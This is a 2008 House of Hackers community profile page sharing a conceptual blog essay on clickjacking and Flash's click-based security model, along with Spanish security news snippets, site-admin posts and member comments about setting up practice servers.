-
Creegan 11.9
23, Male
San José, Costa Rica - Share
- Applications
- Blog Posts (2)
- Discussions (53)
- Events
- Groups (8)
- Photos
- Photo Albums
- Videos
Creegan 11.9's Groups
-
Hackers Hispanos
65 members
-
HoH Startups
9 members
-
n00b hackers
21 members
-
Reversing
139 members
-
Assembly
58 members
Creegan 11.9's discussions
CR33G4N'S SHARES
Clickjacking and Flash
I heard of clickjacking a couple of weeks back when the media blast started. At that time a had a very vague idea what it was and just recently I saw some POCs coming out to show how it works in practice.
Clickjacking, if I may categorize it, falls into the category of GUI attacks. I associate the clickjacking attack with the focus stealing attack which allows attackers to steal any file from the disk as long as they trick the victim to type enough characters. Ok, this is not a razor-sharp exploit but it is an exploit nevertheless.
In essence, the clickjacking technique allows attackers to trick the victim to click on areas of a disguised HTML elements such as an IFRAME preloaded with let’s say your Facebook account information. If nothing else, clickjacking is the killer of most anti-CSRF techniques.
I haven’t been thinking about clickjacking at all. I mean the attack is quite obvious and the potentials for damage are there. However, this morning when woke up, an interesting question started to circulate in my head. What is Adobe’s deal?
After all, Adobe are the ones who asked Jeremiah and rsnake to cancel their OWASP presentation. The answer came quite quickly and naturally.
The simple truth is that Adobe are worried about the clickjacking technique because Flash’s current and even future and a lot more enhanced security model relies on user interactions, i.e. clicks performed by the user. Therefore, today attackers can trick the user to allow the microphone to survey the sound in the room where the victim’s equipment is located. They can use clickjacking for that! But there is more.
If you have been following the development of the Flash platform, you are probably aware that Flash will soon become practically the most powerful web tool out there. Seriously, Adobe are revolutionizing the way we interact with the Web. Not only Flash will support a primitive P2P streaming protocol (I need to think of something malicious to do with that…), but they will also allow users to open and save files from and to their local disk. The only catch is that this feature is available via the FileReference class which contains methods that cannot be accessed directly. Instead, the developer needs to bind them to onclick events.
IMHO I do not think that this security model is bulletproof. The potentials for abuse are obvious, and since clicks are the driving force of future Flash’s security model, then clickjacking is what it comes to mind if you want to abuse them. Perhaps, in the future we might be able to connect to TCP sockets as long as the user clicks?
In conclusion, clickjacking is not a killer problem and it does not break the web, well not entirely. However the clickjacking problem is hard to solve. IMHO, I believe that it is even harder to solve then any overflow you may have to deal with. Why? Because we are dealing with user interaction and graphic design related problems. The solution has to be so clean that it doesn’t break half of the Web.
---
gnucitizen information security gigs part of the cutting-edge network:
- GNUCITIZEN Bump This
- Information Security Services
- GNUCITIZEN Cutting-edge Think Tank
- GNUCITIZEN Portfolio
- Need Hackers?
---
recent posts from the gnucitizen cutting-edge network:
Cards swiped under your nose
Spin Hunters is Back
Waving hand around for no reason.
Brute force WIFI with NVidia
Sing your way to online safety
Reclutas al servicio de Facebook
La próxima generación de espías del Reino Unido también depende en parte de Facebook. El servicio de inteligencia secreto británico, MI6 busca agentes dentro de la popular red social. Es habitual que esta institución busque reclutas y se promocione dentro de las universidades del país británico por lo que no resulta extraño que ahora busquen talentos dentro de Facebook, una red social muy utilizada entre los universitarios.
Venden un ordenador en eBay con los datos bancarios de varios clientes
Londres. (EFECOM).- Los datos bancarios de clientes de varios bancos han sido hallados en el disco duro de un ordenador vendido en Inglaterra en eBay, la compañía de subastas por internet. El disco contenía los números de cuentas bancarias, los de teléfonos y las firmas de más de un millón de clientes de American Express, NatWest y del Royal Bank of Scotland, informa hoy el periódico británico "The Independent".
Creegan's Corner
Latest Activity
Profile Information
- Real Name:
- Esteban A. Torres Hernández
- Occupation:
- Software Developer
Creegan 11.9's Blog
A Social Experiment contestants
OK, here I'm going to write down the list of "enlisted" contestants for the "Social Experiment".
So far we have:
- Codejunky
-… Continue
Posted on September 30th, 2008 at 4:00pm — 4 Comments
HoH Administrators
As many of you have noticed, or should have, HoH has new administrators.
Basically this note is to make those administrators know by everyone, explaining a little details of everyone so each one of you knows to whom talk when the time comes.
All of us really want to make this site a better place, and also take away the script kiddies.
Also we have the goal to avoid illegal activities, to make it short, to keep the ethic rules of the site.
…
Continue
Posted on September 22nd, 2008 at 10:30pm — 8 Comments
About House of Hackers
Petko D. (pdp) Petkov
created this social network on Ning.
© 2008 Created by Petko D. (pdp) Petkov on Ning. Create your own social network
Comment Wall (19 comments)
You need to be a member of House of Hackers to add comments!
Join this network
Sew
Viendo que hablas español, paso a contarte un poco la idea en este idioma.
No hay problema por de quien es la idea ni mucho menos, al contrario, no es nada nuevo que no se haya echo antes. La idea es solamente que viendo que tengo un par de pcs sin utilizar en mi piesa por el momento, se me ocurrio levantar algun tipo de servidores o algo por el estilo y jugar a tirarlos abajo, controlarlos, o esconder algun archivo en el mismo y jugar a ver quien lo consigue y lo postea en un blog de HoH.
Obviamente yo no jugaria, ya que no tiene sentido sino. Pero bueno, por lo menos para darle un poco mas de movimiento a HoH y si todo resulta bien quizas algun dia alguien mas ponga un servidor y ahi si podre jugar, sino no hay problema.
Pero bueno, con gusto ofrezco levantar los servidores para hacer un juego o si a alguien se le ocurre alguna otra idea con la que podamos utilizar estas 2 pcs, bienvenida sea.
Saludos Creegan.
What happened to PDP - is he still a administrator?
...and why has the latest blog entries been removed from the main page? This used to be the first stories I read when logging in?
View All Comments